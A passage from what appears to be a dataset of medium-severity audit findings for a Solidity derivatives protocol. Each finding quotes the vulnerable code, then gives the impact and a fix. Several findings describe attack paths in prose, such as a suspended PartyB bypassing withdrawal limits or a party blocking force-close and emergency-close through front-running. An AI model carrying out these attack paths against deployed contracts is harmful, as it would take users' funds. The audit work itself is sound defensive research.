accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n -Wrong calculation of solvency after request to close and after close positionчmediumч`isSolventAfterClosePosition` and `isSolventAfterRequestToClosePosition` do not account for the extra profit that the user would get from closing the 
position.\\nWhen a party A creates a request for closing a position, the `isSolventAfterRequestToClosePosition` function is called to check if the user is solvent after the request. In the same way, when someone tries to close a position, the `isSolventAfterClosePosition` function is called to check if both party A and party B are solvent after closing the position.\\nBoth functions calculate the available balance for party A and party B, and revert if it is lower than zero. After that, the function accounts for the the extra loss that the user would get as a result of the difference between `closePrice` and `upnlSig.price`, and checks if the user is solvent after that.\\nThe problem is that the function does not account for the opposite case, that is the case where the user would get an extra profit as a result of the difference between `closePrice` and `upnlSig.price`. This means that the user would not be able to close the position, even if at the end of the transaction they would be solvent.\\nProof of Concept\\nThere is an open position with:\\nPosition type: LONG\\nQuantity: 1\\nLocked: 50\\nOpened price: 100\\nCurrent price: 110\\nQuote position uPnL Party A: 10\\nParty B calls `fillCloseRequest` with:\\nClosed price: 120\\nIn `isSolventAfterClosePosition` the following is calculated:\\n```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n\\nAnd it reverts on:\\n```\\nrequire(\\n partyBAvailableBalance >= 0 && partyAAvailableBalance >= 0,\\n \"LibSolvency: Available balance is lower than zero\"\\n);\\n```\\n\\nHowever, the extra profit for `closedPrice - upnlSig.price = 120 - 110 = 10` is not accounted for in the `partyAAvailableBalance` calculation, that should be `partyAAvailableBalance = - 5 + 10 = 5`. 
Party A would be solvent after closing the position, but the transaction reverts.чAdd the extra profit to the `partyAAvailableBalance` calculation.чIn a situation where the difference between the closed price and the current price will make the user solvent, users will not be able to close their positions, even if at the end of the transaction they would be solvent.ч```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n -Malicious PartyB can block unfavorable close position requests causing a loss of profits for PartyBчmediumчMalicious PartyB can block close position requests that are unfavorable toward them by intentionally choose not to fulfill the close request and continuously prolonging the force close position cooldown period, causing a loss of profits for PartyA.\\nIf PartyA invokes the `requestToClosePosition` function for an open quote, the quote's status will transition from `QuoteStatus.OPEN` to `QuoteStatus.CLOSE_PENDING`. In case PartyB fails to fulfill the close request (fillCloseRequest) during the cooldown period (maLayout.forceCloseCooldown), PartyA has the option to forcibly close the quote by utilizing the `forceClosePosition` function.\\n```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyAFacet: Invalid state\");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n \"PartyAFacet: Cooldown not reached\"\\n );\\n..SNIP..\\n```\\n\\nNevertheless, malicious PartyB can intentionally choose not to fulfill the close request and can continuously prolong the `quote.modifyTimestamp`, thereby preventing PartyA 
from ever being able to activate the `forceClosePosition` function.\\nMalicious PartyB could extend the `quote.modifyTimestamp` via the following steps:\\nLine 282 of the `fillCloseRequest` show that it is possible to partially fill a close request. As such, calls the `fillCloseRequest` function with the minimum possible `filledAmount` for the purpose of triggering the `LibQuote.closeQuote` function at Line 292.\\n```\\nFile: PartyBFacetImpl.sol\\n function fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal {\\n..SNIP..\\n if (quote.orderType == OrderType.LIMIT) {\\n require(quote.quantityToClose >= filledAmount, \"PartyBFacet: Invalid filledAmount\");\\n } else {\\n require(quote.quantityToClose == filledAmount, \"PartyBFacet: Invalid filledAmount\");\\n }\\n..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, closedPrice);\\n }\\n```\\n\\nOnce the `LibQuote.closeQuote` function is triggered, Line 153 will update the `quote.modifyTimestamp` to the current timestamp, which effectively extends the cooldown period that PartyA has to wait before allowing to forcefully close the position.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n..SNIP..\\n```\\nчThe `quote.modifyTimestamp` is updated to the current timestamp in many functions, including the `closeQuote` function, as shown in the above example. A quick search within the codebase shows that there are around 17 functions that update the `quote.modifyTimestamp` to the current timestamp when triggered. 
Each of these functions serves as a potential attack vector for malicious PartyB to extend the `quote.modifyTimestamp` and deny users from forcefully closing their positions\\nIt is recommended not to use the `quote.modifyTimestamp` for the purpose of determining if the force close position cooldown has reached, as this variable has been used in many other places. Instead, consider creating a new variable, such as `quote.requestClosePositionTimestamp` solely for the purpose of computing the force cancel quote cooldown.\\nThe following fixes will prevent malicious PartyB from extending the cooldown period since the `quote.requestClosePositionTimestamp` variable is only used solely for the purpose of determining if the force close position cooldown has reached.\\n```\\nfunction requestToClosePosition(\\n uint256 quoteId,\\n uint256 closePrice,\\n uint256 quantityToClose,\\n OrderType orderType,\\n uint256 deadline,\\n SingleUpnlAndPriceSig memory upnlSig\\n) internal {\\n..SNIP..\\n accountLayout.partyANonces[quote.partyA] // Add the line below\\n= 1;\\n quote.modifyTimestamp = block.timestamp;\\n// Add the line below\\n quote.requestCancelQuoteTimestamp = block.timestamp;\\n```\\n\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyAFacet: Invalid state\");\\n require(\\n// Remove the line below\\n block.timestamp > quote.modifyTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n// Add the line below\\n block.timestamp > quote.requestCancelQuoteTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n \"PartyAFacet: Cooldown not reached\"\\n );\\n```\\n\\nIn addition, review the 
`forceClosePosition` function and apply the same fix to it since it is vulnerable to the same issue, but with a different impact.чPartyB has the ability to deny users from forcefully closing their positions by exploiting the issue. Malicious PartyB could abuse this by blocking PartyA from closing their positions against them when the price is unfavorable toward them. For instance, when PartyA is winning the game and decides to close some of its positions against PartyB, PartyB could block the close position request to deny PartyA of their profits and prevent themselves from losing the game.ч```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyAFacet: Invalid state\");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n \"PartyAFacet: Cooldown not reached\"\\n );\\n..SNIP..\\n```\\n -Users might immediately be liquidated after position opening leading to a loss of CVA and Liquidation feeчmediumчThe insolvency check (isSolventAfterOpenPosition) within the `openPosition` function does not consider the locked balance adjustment, causing the user account to become insolvent immediately after the position is opened.
As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n\\nThe leverage of a position is computed based on the following formula.\\n$leverage = \\frac{price \\times quantity}{lockedValues.total()}$\\nWhen opening a position, there is a possibility that the leverage might change because the locked values and quantity are fixed, but it could get filled with a different market price compared to the one at the moment the user requested. Thus, the purpose of Line 163 above is to adjust the locked values to maintain a fixed leverage. After the adjustment, the locked value might be higher or lower.\\nThe issue is that the insolvency check at Line 150 is performed before the adjustment is made.\\nAssume that the adjustment in Line 163 cause the locked values to increase. The insolvency check (isSolventAfterOpenPosition) at Line 150 will be performed with old or unadjusted locked values that are smaller than expected. 
Since smaller locked values mean that there will be more available balance, this might cause the system to miscalculate that an account is not liquidatable, but in fact, it is actually liquidatable once the adjusted increased locked value is taken into consideration.\\nIn this case, once the position is opened, the user account is immediately underwater and can be liquidated.\\nThe issue will occur in the \"complete fill\" path and \"partial fill\" path since both paths adjust the locked values to maintain a fixed leverage. The \"complete fill\" path adjusts the locked values at Line 185чConsider performing the insolvency check with the updated adjusted locked values.чUsers might become liquidatable immediately after opening a position due to an incorrect insolvency check within the `openPosition`, which erroneously reports that the account will still be healthy after opening the position, while in reality, it is not. As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.ч```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n 
accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n -Suspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest`чmediumчSuspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest` function. Thus, an attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.\\n```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n\\nWhen a user is suspended, they are not allowed to call any of the `withdraw` functions (withdraw and withdrawTo) to `withdraw` funds from their account. These withdrawal functions are guarded by the `notSuspended` modifier that will revert if the user's address is suspended.\\n```\\nFile: Accessibility.sol\\n modifier notSuspended(address user) {\\n require(\\n !AccountStorage.layout().suspendedAddresses[user],\\n \"Accessibility: Sender is Suspended\"\\n );\\n _;\\n }\\n```\\n\\nHowever, suspected PartyBs can bypass this restriction by exploiting the `fillCloseRequest` function to transfer the assets out of the protocol. Following describe the proof-of-concept:\\nAnyone can be a PartyA within the protocol. Suspended PartyBs use one of their wallet addresses to operate as a PartyA.\\nUse the PartyA to create a new position with an unfavorable price that will immediately result in a significant loss for any PartyB who takes on the position. 
The `partyBsWhiteList` of the new position is set to PartyB address only to prevent some other PartyB from taking on this position.\\nOnce PartyB takes on the position, PartyB will immediately incur a significant loss, while PartyA will enjoy a significant gain due to the zero-sum nature of this game.\\nPartyA requested to close its position to lock the profits and PartyB will fill the close request.\\nPartyA calls the deallocate and withdraw functions to move the assets/gains out of the protocol.чAdd the `notSuspended` modifier to the `openPosition` and `fillCloseRequest` functions to block the above-described attack path.\\n```\\nfunction fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\n\\n```\\nfunction openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\nчIn the event of an attack, the protocol will suspend the malicious account and prevent it from transferring ill-gotten gains out of the protocol. 
However, since this restriction can be bypassed, the attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.ч```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n -Imbalanced approach of distributing the liquidation fee within `setSymbolsPrice` functionчmediumчThe imbalanced approach of distributing the liquidation fee within `setSymbolsPrice` function could be exploited by malicious liquidators to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, it causes harm or losses to other parties within the protocols.\\nA PartyA can own a large number of different symbols in its portfolio. To avoid out-of-gas (OOG) errors from occurring during liquidation, the `setSymbolsPrice` function allows the liquidators to inject the price of the symbols in multiple transactions instead of all in one go.\\nAssume that the injection of the price symbols requires 5 transactions/rounds to complete and populate the price of all the symbols in a PartyA's portfolio. Based on the current implementation, only the first liquidator that calls the `setSymbolsPrice` will receive the liquidation fee.
Liquidators that call the `setSymbolsPrice` function subsequently will not be added to the `AccountStorage.layout().liquidators[partyA]` listing as Line 88 will only be executed once when the `liquidationType` is still not initialized yet.\\n```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n \"LiquidationFacet: Invalid upnl sig\"\\n );\\n }\\n }\\n```\\n\\nA malicious liquidator could take advantage of this by only setting the symbol prices for the first round for each liquidation happening in the protocol. To maximize their profits, the malicious liquidator would call the `setSymbolsPrice` with none or only one (1) symbol price to save on the gas cost. The malicious liquidator would then leave it to the others to complete the rest of the liquidation process, and they will receive half of the liquidation fee at the end of the liquidation process.\\nSomeone would eventually need to step in to complete the liquidation process. Even if none of the liquidators is incentivized to complete the process of setting the symbol prices since they will not receive any liquidation fee, the counterparty would eventually have no choice but to step in to perform the liquidation themselves. Otherwise, the profits of the counterparty cannot be realized. 
At the end of the day, the liquidation will be completed, and the malicious liquidator will still receive the liquidation fee.чConsider a more balanced approach for distributing the liquidation fee for liquidators that call the `setSymbolsPrice` function. For instance, the liquidators should be compensated based on the number of symbol prices they have injected.\\nIf there are 10 symbols to be filled up and Bob filled up 4 out of 10 symbols, he should only receive 40% of the liquidation fee. This approach has already been implemented within the `liquidatePartyB` function via the `partyBPositionLiquidatorsShare` variable. Thus, the same design could be retrofitted into the `setSymbolsPrice` function.чMalicious liquidators could exploit the liquidation process to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, many liquidations would be stuck halfway since it is likely that no other liquidators will step in to complete the setting of the symbol prices because they will not receive any liquidation fee for doing so (not incentivized).\\nThis could potentially lead to the loss of assets for various parties:\\nThe counterparty would eventually have no choice but to step in to perform the liquidation themselves.
The counterparty has to pay for its own liquidation, even though it has already paid half the liquidation fee to the liquidator.\\nMany liquidations would be stuck halfway, and liquidation might be delayed, which exposes users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.ч```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n \"LiquidationFacet: Invalid upnl sig\"\\n );\\n }\\n }\\n```\\n -Liquidators will not be incentivized to liquidate certain PartyB accounts due to the lack of incentivesчmediumчLiquidating certain accounts does not provide a liquidation fee to the liquidators. 
Liquidators will not be incentivized to liquidate such accounts, which may lead to liquidation being delayed or not performed, exposing Party B to unnecessary risks and potentially resulting in greater asset losses than anticipated.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n\\nAssume that the loss of Party B is more than the liquidation fee. In this case, the else branch of the above code within the `liquidatePartyB` function will be executed. The `liquidatorShare` and `partyBPositionLiquidatorsShare` variables will both be zero, which means the liquidators will get nothing in return for liquidating PartyBs.\\nAs a result, there will not be any incentive for the liquidators to liquidate such positions.чConsider updating the liquidation incentive mechanism that will always provide some incentive for the liquidators to take the initiative to liquidate insolvent accounts. This will help to build a more robust and efficient liquidation mechanism for the protocols. One possible approach is to always give a percentage of the CVA of the liquidated account as a liquidation fee to the liquidators.чLiquidators will not be incentivized to liquidate those accounts that do not provide them with a liquidation fee. As a result, the liquidation of those accounts might be delayed or not performed at all.
When liquidation is not performed in a timely manner, PartyB ended up taking on additional unnecessary risks that could be avoided in the first place if a different liquidation incentive mechanism is adopted, potentially leading to PartyB losing more assets than expected.\\nAlthough PartyBs are incentivized to perform liquidation themselves since it is the PartyBs that take on the most risks from the late liquidation, the roles of PartyB and liquidator are clearly segregated in the protocol design. Only addresses granted the role of liquidators can perform liquidation as the liquidation functions are guarded by `onlyRole(LibAccessibility.LIQUIDATOR_ROLE)`. Unless the contracts are implemented in a manner that automatically grants a liquidator role to all new PartyB upon registration OR liquidation functions are made permissionless, PartyBs are likely not able to perform the liquidation themselves when the need arises.\\nMoreover, the PartyBs are not expected to be both a hedger and liquidator simultaneously as they might not have the skillset or resources to maintain an infrastructure for monitoring their accounts/positions for potential late liquidation.ч```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n -`emergencyClosePosition` can be blockedчmediumчThe `emergencyClosePosition` function can be blocked as PartyA can change the position's status, which causes the transaction to revert when executed.\\nActivating the emergency mode can 
be done either for a specific PartyB or for the entire system. Once activated, PartyB gains the ability to swiftly close positions without requiring users' requests. This functionality is specifically designed to cater to urgent situations where PartyBs must promptly close their positions.\\nBased on the `PartyBFacetImpl.emergencyClosePosition` function, a position can only be \"emergency\" close if its status is `QuoteStatus.OPENED`.\\n```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, \"PartyBFacet: Invalid state\");\\n..SNIP..\\n```\\n\\nAs a result, if PartyA knows that emergency mode has been activated, PartyA could pre-emptively call the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) against their positions to change the state to `QuoteStatus.CLOSE_PENDING` so that the `PartyBFacetImpl.emergencyClosePosition` function will always revert when triggered by PartyB. This effectively blocks PartyB from \"emergency\" close the positions in urgent situations.\\nPartyA could also block PartyB \"emergency\" close on-demand by front-running PartyB's `PartyBFacetImpl.emergencyClosePosition` transaction with the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) when detected.\\nPartyB could accept the close position request of 1 wei to revert the quote's status back to `QuoteStatus.OPENED` and try to perform an \"emergency\" close again. 
However, a sophisticated malicious user could front-run PartyA to revert the quote's status back to `QuoteStatus.CLOSE_PENDING` again to block the \"emergency\" close for a second time.чUpdate the `emergencyClosePosition` so that the \"emergency\" close can still proceed even if the position's status is `QuoteStatus.CLOSE_PENDING`.\\n```\\nfunction emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// Remove the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED, \"PartyBFacet: Invalid state\");\\n// Add the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED || quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyBFacet: Invalid state\");\\n..SNIP..\\n```\\nчDuring urgent situations where emergency mode is activated, the positions need to be promptly closed to avoid negative events that could potentially lead to serious loss of funds (e.g. the protocol is compromised, and the attacker is planning to or has started draining funds from the protocols). However, if the emergency closure of positions is blocked or delayed, it might lead to unrecoverable losses.ч```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, \"PartyBFacet: Invalid state\");\\n..SNIP..\\n```\\n -Position value can fall below the minimum acceptable quote valueчmediumчPartyB can fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue). 
As a result, it breaks the invariant that the value of position must be above the minimum acceptable quote value, leading to various issues and potentially losses for the users.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\"\\n );\\n }\\n }\\n```\\n\\nIf the user has already sent the close request, but partyB has not filled it yet, the user can request to cancel it by calling the `CancelCloseRequest` function. This will cause the quote's status to change to `QuoteStatus.CANCEL_CLOSE_PENDING`.\\nPartyB can either accept the cancel request or fill the close request ignoring the user's request. If PartyB decided to go ahead to fill the close request partially, the second branch of the if-else statement at Line 196 will be executed. However, the issue is that within this branch, PartyB is not subjected to the `minAcceptableQuoteValue` validation check. 
Thus, it is possible for PartyB to fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue).чIf the user sends a close request and PartyB decides to go ahead to fill the close request partially, consider checking if the remaining value of the position is above the minimum acceptable quote value (minAcceptableQuoteValue) after PartyB has filled the position.\\n```\\nfunction closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n ..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n// Add the line below\\n \\n// Add the line below\\n require(\\n// Add the line below\\n quote.lockedValues.total() >=\\n// Add the line below\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n// Add the line below\\n \"LibQuote: Remaining quote value is low\"\\n// Add the line below\\n );\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\"\\n );\\n }\\n}\\n```\\nчIn the codebase, the `minAcceptableQuoteValue` is currently set to 5 USD. There are many reasons for having a minimum quote value in the first place. For instance, if the value of a position is too low, it will be uneconomical for the liquidator to liquidate the position because the liquidation fee would be too small or insufficient to cover the cost of liquidation. 
Note that the liquidation fee is computed as a percentage of the position value.\\nThis has a negative impact on the overall efficiency of the liquidation mechanism within the protocol, which could delay or stop the liquidation of accounts or positions, exposing users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.ч```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\"\\n );\\n }\\n }\\n```\\n -Rounding error when closing quoteчmediumчRounding errors could occur if the provided `filledAmount` is too small, resulting in the locked balance of an account remains the same even though a certain amount of the position has been closed.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n 
